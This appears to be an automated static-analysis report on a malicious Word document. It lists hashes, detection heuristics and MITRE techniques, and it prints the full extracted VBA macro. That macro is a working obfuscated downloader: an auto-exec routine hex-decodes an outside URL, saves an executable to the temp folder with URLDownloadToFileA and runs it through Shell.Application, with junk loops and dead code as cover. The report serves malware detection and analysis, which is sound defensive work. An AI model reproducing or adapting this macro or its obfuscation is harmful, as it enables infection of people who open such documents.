Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 211fd58aea279d3c…

MALICIOUS

Office (OLE)

43.5 KB Created: 2014-12-08 20:55:00 Authoring application: Microsoft Office Word First seen: 2015-01-04
MD5: 9d0b2db07a5c5a903e0d599c8fcc63ca SHA-1: c7de3ff8b336186e736c6149793612a385ee682f SHA-256: 211fd58aea279d3c65b46ec8bced1fe0fb63b43d0ca32a6868af651d68335d9c
384 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains obfuscated VBA macros that leverage the URLDownloadToFile API to download and execute a second-stage payload. The AutoOpen and Workbook_Open macros trigger this malicious functionality, indicating a downloader or droppper malware. The use of obfuscation and API calls for downloading external content is a common technique for malware distribution.

Heuristics 11

  • ClamAV: Doc.Downloader.Macr-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macr-1
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        Destination = Environ(HexToString("54454D50")) & HexToString("5C3156324D555932585759534658512E657865")
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8597 bytes
SHA-256: 9614db20be5811b91a4d7a43f3baaeaedff9ac4487189ae7375dfd4e1300f4ff
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Win64 Then
    Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
ByVal UUQCES As String, ByVal VKDDKH As String, ByVal XXRYIY As Long, _
ByVal RPBFSI As Long) As Long
#Else
    Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
ByVal UUQCES As String, ByVal VKDDKH As String, ByVal XXRYIY As Long, _
ByVal RPBFSI As Long) As Long
#End If

Sub azaza()
fdigjkf
End Sub
Sub AutoOpen()
    azaza
End Sub
Sub Workbook_Open()
    azaza
End Sub
Sub fdigjkf()
Dim RJkZmwMk As Integer
For RJkZmwMk = 0 To 2
Dim gOBzOgqU As Integer
For gOBzOgqU = 0 To 2
If 955689 = 955689 + 1 Then End
If 3474 < 96 Then
        MsgBox (HexToString("5677734F6D61436F3138"))
End If
If Len(HexToString("68766372514F4A7237393238")) = Len(HexToString("476B554868716964")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next gOBzOgqU
If 685526 = 685526 + 1 Then End
If 6625 < 25 Then
        MsgBox (HexToString("674E6B646E506D613434"))
End If
If Len(HexToString("43697476567A577434363732")) = Len(HexToString("474A714567704E4D")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next RJkZmwMk
Dim lszHAqCJ As Integer
For lszHAqCJ = 0 To 5
If 854281 = 854281 + 1 Then End
If 6253 < 58 Then
        MsgBox (HexToString("566379706365674C3333"))
End If
If Len(HexToString("43506D647A746D7533323139")) = Len(HexToString("696F774F654C6652")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next lszHAqCJ
If 183441 = 183441 + 1 Then End
If 5497 < 78 Then
        MsgBox (HexToString("415A5647447743683834"))
End If
If Len(HexToString("4A4D47496279494432343534")) = Len(HexToString("494557444866445A")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
    SourceName = HexToString("687474703A2F2F6A61736F6E6375727469732E636F2E756B2F6A732F62696E2E657865")


Dim DHVtTdBh As Integer
For DHVtTdBh = 0 To 9
Dim cObzsaQX As Integer
For cObzsaQX = 0 To 9
If 439747 = 439747 + 1 Then End
If 4332 < 16 Then
        MsgBox (HexToString("46544C74726F42493831"))
End If
If Len(HexToString("534C6F694971745732343838")) = Len(HexToString("566B70524F42566C")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next cObzsaQX
If 668923 = 668923 + 1 Then End
If 3566 < 69 Then
        MsgBox (HexToString("6B50534F6C4155743431"))
End If
If Len(HexToString("5965454579736C4137323139")) = Len(HexToString("716A6E6B4B556154")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next DHVtTdBh
Dim jceDHuHg As Integer
For jceDHuHg = 0 To 8
If 511345 = 511345 + 1 Then End
If 8831 < 52 Then
        MsgBox (HexToString("5A564A66636C77773634"))
End If
If Len(HexToString("4D4E7A494661686833353734")) = Len(HexToString("6C4D64776C415976")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next jceDHuHg
If 966153 = 966153 + 1 Then End
If 9431 < 53 Then
        MsgBox (HexToString("49446346687173773732"))
End If
If Len(HexToString("6A57714E445A516237343837")) = Len(HexToString("6F526A7465504868")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
    Destination = Environ(HexToString("54454D50")) & HexToString("5C3156324D555932585759534658512E657865")

Dim bbkElRqJ As Integer
For bbkElRqJ = 0 To 1
Dim yFrPalZL As Integer
For yFrPalZL = 0 To 3
If 328237 = 328237 + 1 Then End
If 6119 < 57 Then
        MsgBox (HexToString("6B79546F727679703739"))
End If
If Len(HexToString("5645424D564B634834313636")) = Len(HexToString("6F7A4E6A42556A64")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next yFrPalZL
If 132136 = 132136 + 1 Then End
If 1189 < 35 Then
        MsgBox (HexToString("6361476C5A664F723838"))
End If
If Len(HexToString("6C525358456B554C37313436")) = Len(HexToString("564B495068446743")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next bbkElRqJ
Dim BZUmTvUs As Integer
For BZUmTvUs = 0 To 2
If 272823 = 272823 + 1 Then End
If 2853 < 81 Then
        MsgBox (HexToString("6E797969557159763635"))
End If
If Len(HexToString("626C6D716473535138383139")) = Len(HexToString("504B77556661546F")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next BZUmTvUs
If 985756 = 985756 + 1 Then End
If 6833 < 83 Then
        MsgBox (HexToString("5461686C7461706B3734"))
End If
If Len(HexToString("576C69664B51584731353636")) = Len(HexToString("6255727A4575454C")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
    R = URLDownloadToFileA(0&, SourceName, Destination, 0&, 0&)

Dim IvVtEwhF As Integer
For IvVtEwhF = 0 To 8
Dim JmFMnIxK As Integer
For JmFMnIxK = 0 To 4
If 731477 = 731477 + 1 Then End
If 5925 < 46 Then
        MsgBox (HexToString("4A70476D7A5342453936"))
End If
If Len(HexToString("487874635944744A32393732")) = Len(HexToString("6157794D555A4266")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next JmFMnIxK
If 522828 = 522828 + 1 Then End
If 2294 < 56 Then
        MsgBox (HexToString("7368616E4A6C76783337"))
End If
If Len(HexToString("41494B6D4572714C39323531")) = Len(HexToString("7958476F68624B43")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next IvVtEwhF
Dim PokTrFAq As Integer
For PokTrFAq = 0 To 3
If 926197 = 926197 + 1 Then End
If 3188 < 27 Then
        MsgBox (HexToString("61696D725A597A713439"))
End If
If Len(HexToString("5954474778616C4A31313535")) = Len(HexToString("4A72477178486467")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next PokTrFAq
If 959838 = 959838 + 1 Then End
If 9367 < 37 Then
        MsgBox (HexToString("776659706B6641723731"))
End If
If Len(HexToString("6B4A5A536C6B764C37333234")) = Len(HexToString("5874766E74447943")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
    Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))

fdfgdfeer4gf.Open Destination
End Sub


Public Function HexToString(ByVal fSoeUjt As String) As String
Dim cOBcy As String
Dim aGZKOocaTmjFc As String
Dim GCNQgBCMVQ As Long
For GCNQgBCMVQ = 1 To Len(fSoeUjt) Step 2

GoTo ypgcwVuP
Dim PyXKOlVZ As String
Open "WFZLQU.WQZ" For Binary As 61

GoTo EcTiprEi
Dim olfZxvmN As String
Open "UMQSTP.UJQ" For Binary As 23
Put #23, , olfZxvmN
Close #23
EcTiprEi:

Put #61, , PyXKOlVZ

GoTo SxsOmWIy
Dim kkLtIhbV As String
Open "QLANPT.WSB" For Binary As 33
Put #33, , kkLtIhbV
Close #33
SxsOmWIy:

Close #61

GoTo UNIWzNhk
Dim dWjjhmup As String
Open "OISYAI.OYD" For Binary As 28
Put #28, , dWjjhmup
Close #28
UNIWzNhk:

ypgcwVuP:


GoTo GowCpKKx
Dim lrekcdOf As String
Open "SDYYTR.SPY" For Binary As 39
Put #39, , lrekcdOf
Close #39
GowCpKKx:

cOBcy = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(fSoeUjt, GCNQgBCMVQ, 2)))

GoTo rmmXlBRJ
Dim OhejTlwO As String
Open "MLTYOU.RQE" For Binary As 62

GoTo CoWXDRlP
Dim ZrEkNNpZ As String
Open "VCCFOH.UGW" For Binary As 74
Put #74, , ZrEkNNpZ
Close #74
CoWXDRlP:

Put #62, , OhejTlwO

GoTo KSlimPNX
Dim QeoLsJgb As String
Open "WSOMBL.FBR" For Binary As 79
Put #79, , QeoLsJgb
Close #79
KSlimPNX:

Close #62

GoTo JXbUkQce
Dim OdhliKSY As String
Open "MJSUVL.ROP" For Binary As 62
Put #62, , OdhliKSY
Close #62
JXbUkQce:

rmmXlBRJ:


GoTo POelWJZw
Dim ENMrSVJB As String
Open "JQABDX.AEB" For Binary As 59
Put #59, , ENMrSVJB
Close #59
POelWJZw:

aGZKOocaTmjFc = aGZKOocaTmjFc & cOBcy
Next GCNQgBCMVQ

GoTo iCcPqWja
Dim DKytcjiL As String
Open "XUUNTY.SOO" For Binary As 77

GoTo kLqGaseY
Dim XGKpfUWv As String
Open "ATNZAF.PCV" For Binary As 87
Put #87, , XGKpfUWv
Close #87
kLqGaseY:

Put #77, , DKytcjiL

GoTo dcUaIkQK
Dim JlgwWSZP As String
Open "VMQIJJ.VJS" For Binary As 83
Put #83, , JlgwWSZP
Close #83
dcUaIkQK:

Close #77

GoTo qUFnTloB
Dim GZwWKDNJ As String
Open "CBGWHJ.FZJ" For Binary As 75
Put #75, , GZwWKDNJ
Close #75
qUFnTloB:

iCcPqWja:


GoTo ebWXGwas
Dim IwEjzJLe As String
Open "AYCFPS.PVW" For Binary As 87
Put #87, , IwEjzJLe
Close #87
ebWXGwas:

HexToString = aGZKOocaTmjFc
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.